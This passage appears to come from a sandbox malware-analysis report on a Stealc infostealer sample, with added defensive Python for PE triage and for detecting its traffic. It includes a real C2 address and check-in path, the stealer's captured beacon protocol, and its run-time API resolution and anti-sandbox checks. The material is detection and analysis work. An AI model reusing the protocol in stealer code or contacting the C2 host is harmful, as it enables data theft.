.idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x24c000 | 0x2a2000 | 0x200 | c62ad87c92c3a5276e9be62eea94a46b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vxwrnjjb | 0x4ee000 | 0x19c000 | 0x19b200 | 4ba297097c4b726df6b6897ea132f711 | False | 0.9949987173152934 | data | 7.9545182277365285 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
aqjwqyrz | 0x68a000 | 0x1000 | 0x400 | 81d09b7bb45abc4787695b75ab803387 | False | 0.80859375 | data | 6.193376999651223 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x68b000 | 0x3000 | 0x2200 | c5b3d3e9c86d8c41b8d70271fd347152 | False | 0.05847886029411765 | DOS executable (COM) | 0.7422190545502548 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Every section except .rsrc and .idata is mapped readable, writable and executable. vxwrnjjb carries 0x19b200 (1,684,992) raw bytes, about 94% of the 1,789,952-byte file, at 7.95 bits of entropy per byte; the two unnamed sections hold only 0x16200 and 0x200 raw bytes but reserve 0x249000 and 0x2a2000 bytes of virtual space, i.e. room that is only filled at run time. The entry point (RVA 0x68b000) sits in .taggant, whose 0x2200 raw bytes have an entropy of 0.74.
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x689004 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
The manifest data itself lies at RVA 0x689004, inside vxwrnjjb, even though the resource directory is in .rsrc.

DLL | Import
kernel32.dll | lstrcpy
lstrcpy is the only static import; every other API in the execution graph below is resolved at run time (see the GetPEB / LoadLibraryA / GetProcAddress sequence at b26390).
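The section and directory tables above are the kind of check an analyst automates before opening a sample. What follows is an added example, not Joe Sandbox's code: a standard-library Python script that parses PE section headers and reproduces the report's verdicts (RWX sections, an entry point outside the usual sections, virtual sizes far beyond the raw size, high entropy). The list of "standard" section names and the 8x / 64 KiB / 7.5-bit thresholds are the example's own assumptions. build_sample_pe() is a constructed file that copies only the header values from the table above; its section bodies are filler (zeros, and pseudo-random bytes for vxwrnjjb), not the sample's bytes, so the script runs without the malware. To run it on the real file, pass the bytes of file.exe to triage().

```python
import math
import random
import struct
from collections import Counter

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Assumption: the analyst's own list of section names treated as "standard".
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".CRT"}


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte (0..8); compressed or encrypted data sits near 8."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(pe: bytes):
    """Return (AddressOfEntryPoint RVA, list of section dicts) for a PE32 or PE32+ file."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]      # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]      # SizeOfOptionalHeader
    opt = e_lfanew + 24                                            # optional header start
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]          # AddressOfEntryPoint
    sections = []
    for i in range(nsections):                                     # 40-byte section headers
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "rawsize": rawsize, "chars": chars,
                         "entropy": shannon_entropy(pe[rawptr:rawptr + rawsize])})
    return entry_rva, sections


def section_label(s: dict) -> str:
    return s["name"] or "<unnamed>"


def triage(pe: bytes) -> dict:
    """Reproduce the report's section-table findings for one PE image."""
    entry_rva, sections = parse_pe(pe)
    entry = next((s for s in sections if s["va"] <= entry_rva < s["va"] + s["vsize"]), None)
    return {
        "entry_section": section_label(entry) if entry else None,
        "entry_outside_standard": entry is None or entry["name"] not in STANDARD_SECTIONS,
        "rwx": [section_label(s) for s in sections
                if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE],
        "nonstandard_names": [section_label(s) for s in sections
                              if s["name"] not in STANDARD_SECTIONS],
        # Assumption: >= 64 KiB virtual and > 8x the raw size means the section is
        # filled at run time (an unpacking target), not mere alignment padding.
        "inflated": [section_label(s) for s in sections
                     if s["vsize"] >= 0x10000 and s["vsize"] > 8 * s["rawsize"]],
        # Assumption: above 7.5 bits/byte the raw bytes are packed or encrypted.
        "high_entropy": [section_label(s) for s in sections if s["entropy"] > 7.5],
    }


def build_sample_pe() -> bytes:
    """Constructed PE32 whose section headers copy the report's table (names, RVAs,
    sizes, characteristics). Bodies are synthetic filler, not the sample's bytes."""
    rwx = 0x40 | 0x20000000 | 0x40000000 | 0x80000000   # INITIALIZED_DATA|EXECUTE|READ|WRITE
    rw = 0x40 | 0x40000000 | 0x80000000
    table = [  # name, vsize, va, rawsize, characteristics, pseudo-random body?
        (b"", 0x249000, 0x001000, 0x16200, rwx, False),
        (b".rsrc", 0x1ac, 0x24a000, 0x200, rw, False),
        (b".idata", 0x1000, 0x24b000, 0x200, rw, False),
        (b"", 0x2a2000, 0x24c000, 0x200, rwx, False),
        (b"vxwrnjjb", 0x19c000, 0x4ee000, 0x19b200, rwx, True),
        (b"aqjwqyrz", 0x1000, 0x68a000, 0x400, rwx, False),
        (b".taggant", 0x3000, 0x68b000, 0x2200, rwx, False),
    ]
    opt_size = 0xE0                                        # PE32 optional header size
    raw = ((0x40 + 4 + 20 + opt_size + 40 * len(table)) + 0x1FF) & ~0x1FF   # 512-aligned
    rng, headers, bodies = random.Random(1), b"", b""
    for name, vsize, va, rawsize, chars, rand in table:
        headers += struct.pack("<8sIIIIIIHHI", name, vsize, va, rawsize,
                               raw + len(bodies), 0, 0, 0, 0, chars)
        bodies += (rng.getrandbits(8 * rawsize).to_bytes(rawsize, "little")
                   if rand else bytes(rawsize))
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(table), 0x672FC34F, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 16, 0x68B000)              # entry point inside .taggant
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + headers
    return image + bytes(raw - len(image)) + bodies


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key}: {value}")
```

On the constructed file the script reports .taggant as the entry section (outside the standard set), five RWX sections, both unnamed sections as inflated and only vxwrnjjb as high-entropy, matching the table. The entropy of the real sample's .taggant and aqjwqyrz sections will of course differ from the zero filler used here.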
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-21T11:03:20.179542+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.7 | 49707 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 11:03:18.119792938 CET | 49707 | 80 | 192.168.2.7 | 185.215.113.206
Nov 21, 2024 11:03:18.241224051 CET | 80 | 49707 | 185.215.113.206 | 192.168.2.7
Nov 21, 2024 11:03:18.241317987 CET | 49707 | 80 | 192.168.2.7 | 185.215.113.206
Nov 21, 2024 11:03:18.241914034 CET | 49707 | 80 | 192.168.2.7 | 185.215.113.206
Nov 21, 2024 11:03:18.362509012 CET | 80 | 49707 | 185.215.113.206 | 192.168.2.7
Nov 21, 2024 11:03:19.644452095 CET | 80 | 49707 | 185.215.113.206 | 192.168.2.7
Nov 21, 2024 11:03:19.644525051 CET | 49707 | 80 | 192.168.2.7 | 185.215.113.206
Nov 21, 2024 11:03:19.719203949 CET | 49707 | 80 | 192.168.2.7 | 185.215.113.206
Nov 21, 2024 11:03:19.838788033 CET | 80 | 49707 | 185.215.113.206 | 192.168.2.7
Nov 21, 2024 11:03:20.179471970 CET | 80 | 49707 | 185.215.113.206 | 192.168.2.7
Nov 21, 2024 11:03:20.179542065 CET | 49707 | 80 | 192.168.2.7 | 185.215.113.206
Nov 21, 2024 11:03:22.428448915 CET | 49707 | 80 | 192.168.2.7 | 185.215.113.206
                          • 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49707 | 185.215.113.206 | 80 | 7408 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data

Nov 21, 2024 11:03:18.241914034 CET | 90 | OUT
GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Nov 21, 2024 11:03:19.644452095 CET | 203 | IN
HTTP/1.1 200 OK
Date: Thu, 21 Nov 2024 10:03:19 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Nov 21, 2024 11:03:19.719203949 CET | 412 | OUT
POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJ
Host: 185.215.113.206
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 43 43 33 38 37 45 36 37 43 39 33 32 37 33 31 37 38 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 2d 2d 0d 0a
Data Ascii (CRLF pairs shown as line breaks):
------GDBAKEGIDBGIEBFHDHJJ
Content-Disposition: form-data; name="hwid"

688CC387E67C932731780
------GDBAKEGIDBGIEBFHDHJJ
Content-Disposition: form-data; name="build"

mars
------GDBAKEGIDBGIEBFHDHJJ--

Nov 21, 2024 11:03:20.179471970 CET | 210 | IN
HTTP/1.1 200 OK
Date: Thu, 21 Nov 2024 10:03:19 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=

The check-in posts a host identifier (hwid) and a build name (mars) as a multipart form to a 16-hex-character .php path, sends no User-Agent header, and receives an 8-byte base64 body that decodes to "block". The capture shows no further HTTP requests after this reply.
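As an added example (not the report's or Stealc's code), the exchange above can be parsed and scored in Python. The multipart body is rebuilt from the capture (it is 210 bytes, matching Content-Length, and equals the raw hex above), the reply is base64-decoded, and four traits taken from this one request are checked: the 16-hex-character .php path, the four-dashes-plus-20-capitals boundary, exactly the fields hwid and build, and the missing User-Agent. Those traits and the three-hit alert threshold are the example's own assumptions, not the logic of Suricata rule 2044243; the benign upload request is constructed for comparison.

```python
import base64
import re

# Transcribed from the report's HTTP capture; the body matches the raw hex dump.
BOUNDARY = "----GDBAKEGIDBGIEBFHDHJJ"
CAPTURED_REQUEST = {
    "method": "POST",
    "path": "/c4becf79229cb002.php",
    "headers": {
        "Content-Type": "multipart/form-data; boundary=" + BOUNDARY,
        "Host": "185.215.113.206",
        "Content-Length": "210",
        "Connection": "Keep-Alive",
        "Cache-Control": "no-cache",
    },
    "body": (
        "--" + BOUNDARY + "\r\nContent-Disposition: form-data; name=\"hwid\"\r\n\r\n"
        "688CC387E67C932731780\r\n"
        "--" + BOUNDARY + "\r\nContent-Disposition: form-data; name=\"build\"\r\n\r\n"
        "mars\r\n"
        "--" + BOUNDARY + "--\r\n"
    ).encode(),
}
CAPTURED_REPLY_BODY = b"YmxvY2s="

# Constructed benign file upload for comparison; not from the capture.
BENIGN_BOUNDARY = "----WebKitFormBoundary7MA4YWxkTrZu0gW"
BENIGN_REQUEST = {
    "method": "POST",
    "path": "/api/upload.php",
    "headers": {
        "Content-Type": "multipart/form-data; boundary=" + BENIGN_BOUNDARY,
        "Host": "files.example.test",
        "User-Agent": "Mozilla/5.0",
    },
    "body": (
        "--" + BENIGN_BOUNDARY + "\r\nContent-Disposition: form-data; name=\"description\"\r\n\r\n"
        "quarterly report\r\n"
        "--" + BENIGN_BOUNDARY + "\r\nContent-Disposition: form-data; name=\"file\"; "
        "filename=\"q3.txt\"\r\nContent-Type: text/plain\r\n\r\nhello\r\n"
        "--" + BENIGN_BOUNDARY + "--\r\n"
    ).encode(),
}


def boundary_of(content_type: str):
    """Extract the boundary parameter from a multipart Content-Type value."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    return m.group(1) if m else None


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: value} for a multipart/form-data body."""
    fields = {}
    for part in body.split(b"--" + boundary.encode())[1:]:
        if part.startswith(b"--"):                 # closing delimiter
            break
        head, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            if value.endswith(b"\r\n"):             # strip the CRLF before the next delimiter
                value = value[:-2]
            fields[m.group(1).decode()] = value.decode("latin-1")
    return fields


# Assumptions modelled on the captured request; not the ET rule's logic.
CHECKIN_PATH = re.compile(r"^/[0-9a-f]{16}\.php$")
CHECKIN_BOUNDARY = re.compile(r"^----[A-Z]{20}$")


def checkin_indicators(req: dict) -> list:
    """List the traits of `req` that match the captured Stealc check-in."""
    hits = []
    if req["method"] == "POST" and CHECKIN_PATH.match(req["path"]):
        hits.append("path is 16 hex characters + .php")
    boundary = boundary_of(req["headers"].get("Content-Type", ""))
    if boundary and CHECKIN_BOUNDARY.match(boundary):
        hits.append("boundary is four dashes + 20 upper-case letters")
    fields = parse_multipart(req["body"], boundary) if boundary else {}
    if set(fields) == {"hwid", "build"}:
        hits.append("form fields are exactly hwid and build")
    if "User-Agent" not in req["headers"]:
        hits.append("no User-Agent header")
    return hits


def is_checkin(req: dict) -> bool:
    # Assumption: three independent traits must agree before alerting.
    return len(checkin_indicators(req)) >= 3


def decode_reply(body: bytes) -> str:
    """The C2 answers with a base64 token; the captured one decodes to 'block'."""
    return base64.b64decode(body).decode("ascii", "replace")


if __name__ == "__main__":
    print(parse_multipart(CAPTURED_REQUEST["body"], BOUNDARY))
    print(checkin_indicators(CAPTURED_REQUEST), decode_reply(CAPTURED_REPLY_BODY))
```

The path and boundary traits are the ones most likely to survive a rebuild of the stealer, while the field names are the cheapest to change; requiring three of the four keeps a single coincidental match (a legitimate multipart post without a User-Agent, for instance) from alerting.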
                          Target ID:1
                          Start time:05:03:13
                          Start date:21/11/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0xb00000
                          File size:1'789'952 bytes
                          MD5 hash:88D9A99CA46E751AB8202680C23046F3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1342030048.00000000054D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true


                            Execution Graph

                            Execution Coverage:4.8%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:16.6%
                            Total number of Nodes:1412
                            Total number of Limit Nodes:28
execution_graph: textual dump of the interactive graph, condensed here. Addresses are run-time addresses with the image relocated to 0xb00000 (see the process section above), so RVA = address - 0xb00000. "N API calls" is the report's own summary of a collapsed subgraph.

Main path (b21bf0):
• b02a90: about forty consecutive calls into the helper b04a60 (RtlAllocateHeap at b04a76, then VirtualProtect at b04ab4), then b26390: GetPEB, LoadLibraryA x5, several GetProcAddress (run-time API resolution; the import table names only lstrcpy)
• b21c03: lstrcpy, then ExitProcess (b21c65) or GetSystemInfo (b21c6d), which in turn leads to ExitProcess (b21c7d) or on
• b01030: GetCurrentProcess, VirtualAllocExNuma, then ExitProcess (b01057) or VirtualAlloc, VirtualFree, GlobalMemoryStatusEx (b010d0), then ExitProcess (b01112) or GetUserDefaultLangID (b0111a); back in the caller, ExitProcess (b21cb0) or on
• b22ad0: GetProcessHeap, RtlAllocateHeap, GetComputerNameA; b22a40: GetProcessHeap, RtlAllocateHeap, GetUserNameA, then ExitProcess (b21ce0) or on
• b21cff to b21e30: string assembly with lstrlen, lstrcpy, lstrcat (b22ad0 and b22a40 are called once more)
• b21e56: OpenEventA; if the event exists, a loop of CloseHandle, Sleep, OpenEventA (b21e68); otherwise CreateEventA (b21e8c)
• b21b20: GetSystemTime, b21820 (lstrlen/lstrcpy/lstrcat string assembly), sscanf (b21b81), b02a20 (SystemTimeToFileTime x2), then ExitProcess (b21be2) or on
• b1ffd0: lstrcpy/lstrlen chains, b21570 (4 API calls), b02e70 (more than a hundred calls into b04a60; the dump is cut off inside this chain), b22740 (GetWindowsDirectoryA), b04c50, b18ca0 (StrCmpCA), then, mostly each preceded by b01530 (8 API calls): b060d0 (80 API calls, called repeatedly), b181b0 (10), b17ee0 (lstrlen, lstrcpy, StrCmpCA x3), b18050 (lstrlen, lstrcpy, StrCmpCA, lstrlen, lstrcpy), b05640 (8), b17280 (1498), b183e0 (7), b024e0 (230), b185b0 (47), b1c840 (70), b1d0f0 (118), b1d7b0 (103, setSBCS), b1dfa0 (149), b1e500 (108), b1e720 (120), b1e9e0 (110), b1ecb0 (98), b1eb70 (108), b07bc0 (154), b241e0 (91), b21660 (12)
• b21ea5: CloseHandle, ExitProcess

Other nodes listed in the dump:
• b23130: GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
• b22c10: GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation, wsprintfA
• b230a0: GetSystemPowerStatus
• b229a0: GetCurrentProcess, IsWow64Process
• b24480: OpenProcess, GetModuleFileNameExA, CloseHandle, lstrcpy
• b0100e: GetCurrentProcess, VirtualAllocExNuma, ExitProcess, VirtualAlloc, VirtualFree
• b08e20: malloc, free, std::exception::exception; b07710: free, ctype; b28819: free, free, malloc, free, _raise
• collapsed subgraphs: b1abb2 (120 API calls), b016b9 (200), b0f639 (144), b0bf39 (177), b123a9 (298), b14b29 (303), b24e35 (8), b12499 (290), b0db99 (672), b18615 (47), b2749e (6, ctype), b22880 (10), b23480 (6), b23280 (7), b18c88 (16), b0b309 (98), b2938d (129 API calls, 3 library calls)
26157 b04a60 2 API calls 26156->26157 26158 b03888 26157->26158 26159 b04a60 2 API calls 26158->26159 26160 b038a1 26159->26160 26161 b04a60 2 API calls 26160->26161 26162 b038b7 26161->26162 26163 b04a60 2 API calls 26162->26163 26164 b038cd 26163->26164 26165 b04a60 2 API calls 26164->26165 26166 b038e3 26165->26166 26167 b04a60 2 API calls 26166->26167 26168 b038f9 26167->26168 26169 b04a60 2 API calls 26168->26169 26170 b0390f 26169->26170 26171 b04a60 2 API calls 26170->26171 26172 b03928 26171->26172 26173 b04a60 2 API calls 26172->26173 26174 b0393e 26173->26174 26175 b04a60 2 API calls 26174->26175 26176 b03954 26175->26176 26177 b04a60 2 API calls 26176->26177 26178 b0396a 26177->26178 26179 b04a60 2 API calls 26178->26179 26180 b03980 26179->26180 26181 b04a60 2 API calls 26180->26181 26182 b03996 26181->26182 26183 b04a60 2 API calls 26182->26183 26184 b039af 26183->26184 26185 b04a60 2 API calls 26184->26185 26186 b039c5 26185->26186 26187 b04a60 2 API calls 26186->26187 26188 b039db 26187->26188 26189 b04a60 2 API calls 26188->26189 26190 b039f1 26189->26190 26191 b04a60 2 API calls 26190->26191 26192 b03a07 26191->26192 26193 b04a60 2 API calls 26192->26193 26194 b03a1d 26193->26194 26195 b04a60 2 API calls 26194->26195 26196 b03a36 26195->26196 26197 b04a60 2 API calls 26196->26197 26198 b03a4c 26197->26198 26199 b04a60 2 API calls 26198->26199 26200 b03a62 26199->26200 26201 b04a60 2 API calls 26200->26201 26202 b03a78 26201->26202 26203 b04a60 2 API calls 26202->26203 26204 b03a8e 26203->26204 26205 b04a60 2 API calls 26204->26205 26206 b03aa4 26205->26206 26207 b04a60 2 API calls 26206->26207 26208 b03abd 26207->26208 26209 b04a60 2 API calls 26208->26209 26210 b03ad3 26209->26210 26211 b04a60 2 API calls 26210->26211 26212 b03ae9 26211->26212 26213 b04a60 2 API calls 26212->26213 26214 b03aff 26213->26214 26215 b04a60 2 API calls 26214->26215 26216 b03b15 26215->26216 26217 b04a60 2 API calls 26216->26217 26218 b03b2b 26217->26218 26219 b04a60 2 
API calls 26218->26219 26220 b03b44 26219->26220 26221 b04a60 2 API calls 26220->26221 26222 b03b5a 26221->26222 26223 b04a60 2 API calls 26222->26223 26224 b03b70 26223->26224 26225 b04a60 2 API calls 26224->26225 26226 b03b86 26225->26226 26227 b04a60 2 API calls 26226->26227 26228 b03b9c 26227->26228 26229 b04a60 2 API calls 26228->26229 26230 b03bb2 26229->26230 26231 b04a60 2 API calls 26230->26231 26232 b03bcb 26231->26232 26233 b04a60 2 API calls 26232->26233 26234 b03be1 26233->26234 26235 b04a60 2 API calls 26234->26235 26236 b03bf7 26235->26236 26237 b04a60 2 API calls 26236->26237 26238 b03c0d 26237->26238 26239 b04a60 2 API calls 26238->26239 26240 b03c23 26239->26240 26241 b04a60 2 API calls 26240->26241 26242 b03c39 26241->26242 26243 b04a60 2 API calls 26242->26243 26244 b03c52 26243->26244 26245 b04a60 2 API calls 26244->26245 26246 b03c68 26245->26246 26247 b04a60 2 API calls 26246->26247 26248 b03c7e 26247->26248 26249 b04a60 2 API calls 26248->26249 26250 b03c94 26249->26250 26251 b04a60 2 API calls 26250->26251 26252 b03caa 26251->26252 26253 b04a60 2 API calls 26252->26253 26254 b03cc0 26253->26254 26255 b04a60 2 API calls 26254->26255 26256 b03cd9 26255->26256 26257 b04a60 2 API calls 26256->26257 26258 b03cef 26257->26258 26259 b04a60 2 API calls 26258->26259 26260 b03d05 26259->26260 26261 b04a60 2 API calls 26260->26261 26262 b03d1b 26261->26262 26263 b04a60 2 API calls 26262->26263 26264 b03d31 26263->26264 26265 b04a60 2 API calls 26264->26265 26266 b03d47 26265->26266 26267 b04a60 2 API calls 26266->26267 26268 b03d60 26267->26268 26269 b04a60 2 API calls 26268->26269 26270 b03d76 26269->26270 26271 b04a60 2 API calls 26270->26271 26272 b03d8c 26271->26272 26273 b04a60 2 API calls 26272->26273 26274 b03da2 26273->26274 26275 b04a60 2 API calls 26274->26275 26276 b03db8 26275->26276 26277 b04a60 2 API calls 26276->26277 26278 b03dce 26277->26278 26279 b04a60 2 API calls 26278->26279 26280 b03de7 26279->26280 26281 b04a60 2 API calls 
26280->26281 26282 b03dfd 26281->26282 26283 b04a60 2 API calls 26282->26283 26284 b03e13 26283->26284 26285 b04a60 2 API calls 26284->26285 26286 b03e29 26285->26286 26287 b04a60 2 API calls 26286->26287 26288 b03e3f 26287->26288 26289 b04a60 2 API calls 26288->26289 26290 b03e55 26289->26290 26291 b04a60 2 API calls 26290->26291 26292 b03e6e 26291->26292 26293 b04a60 2 API calls 26292->26293 26294 b03e84 26293->26294 26295 b04a60 2 API calls 26294->26295 26296 b03e9a 26295->26296 26297 b04a60 2 API calls 26296->26297 26298 b03eb0 26297->26298 26299 b04a60 2 API calls 26298->26299 26300 b03ec6 26299->26300 26301 b04a60 2 API calls 26300->26301 26302 b03edc 26301->26302 26303 b04a60 2 API calls 26302->26303 26304 b03ef5 26303->26304 26305 b04a60 2 API calls 26304->26305 26306 b03f0b 26305->26306 26307 b04a60 2 API calls 26306->26307 26308 b03f21 26307->26308 26309 b04a60 2 API calls 26308->26309 26310 b03f37 26309->26310 26311 b04a60 2 API calls 26310->26311 26312 b03f4d 26311->26312 26313 b04a60 2 API calls 26312->26313 26314 b03f63 26313->26314 26315 b04a60 2 API calls 26314->26315 26316 b03f7c 26315->26316 26317 b04a60 2 API calls 26316->26317 26318 b03f92 26317->26318 26319 b04a60 2 API calls 26318->26319 26320 b03fa8 26319->26320 26321 b04a60 2 API calls 26320->26321 26322 b03fbe 26321->26322 26323 b04a60 2 API calls 26322->26323 26324 b03fd4 26323->26324 26325 b04a60 2 API calls 26324->26325 26326 b03fea 26325->26326 26327 b04a60 2 API calls 26326->26327 26328 b04003 26327->26328 26329 b04a60 2 API calls 26328->26329 26330 b04019 26329->26330 26331 b04a60 2 API calls 26330->26331 26332 b0402f 26331->26332 26333 b04a60 2 API calls 26332->26333 26334 b04045 26333->26334 26335 b04a60 2 API calls 26334->26335 26336 b0405b 26335->26336 26337 b04a60 2 API calls 26336->26337 26338 b04071 26337->26338 26339 b04a60 2 API calls 26338->26339 26340 b0408a 26339->26340 26341 b04a60 2 API calls 26340->26341 26342 b040a0 26341->26342 26343 b04a60 2 API calls 26342->26343 
26344 b040b6 26343->26344 26345 b04a60 2 API calls 26344->26345 26346 b040cc 26345->26346 26347 b04a60 2 API calls 26346->26347 26348 b040e2 26347->26348 26349 b04a60 2 API calls 26348->26349 26350 b040f8 26349->26350 26351 b04a60 2 API calls 26350->26351 26352 b04111 26351->26352 26353 b04a60 2 API calls 26352->26353 26354 b04127 26353->26354 26355 b04a60 2 API calls 26354->26355 26356 b0413d 26355->26356 26357 b04a60 2 API calls 26356->26357 26358 b04153 26357->26358 26359 b04a60 2 API calls 26358->26359 26360 b04169 26359->26360 26361 b04a60 2 API calls 26360->26361 26362 b0417f 26361->26362 26363 b04a60 2 API calls 26362->26363 26364 b04198 26363->26364 26365 b04a60 2 API calls 26364->26365 26366 b041ae 26365->26366 26367 b04a60 2 API calls 26366->26367 26368 b041c4 26367->26368 26369 b04a60 2 API calls 26368->26369 26370 b041da 26369->26370 26371 b04a60 2 API calls 26370->26371 26372 b041f0 26371->26372 26373 b04a60 2 API calls 26372->26373 26374 b04206 26373->26374 26375 b04a60 2 API calls 26374->26375 26376 b0421f 26375->26376 26377 b04a60 2 API calls 26376->26377 26378 b04235 26377->26378 26379 b04a60 2 API calls 26378->26379 26380 b0424b 26379->26380 26381 b04a60 2 API calls 26380->26381 26382 b04261 26381->26382 26383 b04a60 2 API calls 26382->26383 26384 b04277 26383->26384 26385 b04a60 2 API calls 26384->26385 26386 b0428d 26385->26386 26387 b04a60 2 API calls 26386->26387 26388 b042a6 26387->26388 26389 b04a60 2 API calls 26388->26389 26390 b042bc 26389->26390 26391 b04a60 2 API calls 26390->26391 26392 b042d2 26391->26392 26393 b04a60 2 API calls 26392->26393 26394 b042e8 26393->26394 26395 b04a60 2 API calls 26394->26395 26396 b042fe 26395->26396 26397 b04a60 2 API calls 26396->26397 26398 b04314 26397->26398 26399 b04a60 2 API calls 26398->26399 26400 b0432d 26399->26400 26401 b04a60 2 API calls 26400->26401 26402 b04343 26401->26402 26403 b04a60 2 API calls 26402->26403 26404 b04359 26403->26404 26405 b04a60 2 API calls 26404->26405 26406 b0436f 
26405->26406 26407 b04a60 2 API calls 26406->26407 26408 b04385 26407->26408 26409 b04a60 2 API calls 26408->26409 26410 b0439b 26409->26410 26411 b04a60 2 API calls 26410->26411 26412 b043b4 26411->26412 26413 b04a60 2 API calls 26412->26413 26414 b043ca 26413->26414 26415 b04a60 2 API calls 26414->26415 26416 b043e0 26415->26416 26417 b04a60 2 API calls 26416->26417 26418 b043f6 26417->26418 26419 b04a60 2 API calls 26418->26419 26420 b0440c 26419->26420 26421 b04a60 2 API calls 26420->26421 26422 b04422 26421->26422 26423 b04a60 2 API calls 26422->26423 26424 b0443b 26423->26424 26425 b04a60 2 API calls 26424->26425 26426 b04451 26425->26426 26427 b04a60 2 API calls 26426->26427 26428 b04467 26427->26428 26429 b04a60 2 API calls 26428->26429 26430 b0447d 26429->26430 26431 b04a60 2 API calls 26430->26431 26432 b04493 26431->26432 26433 b04a60 2 API calls 26432->26433 26434 b044a9 26433->26434 26435 b04a60 2 API calls 26434->26435 26436 b044c2 26435->26436 26437 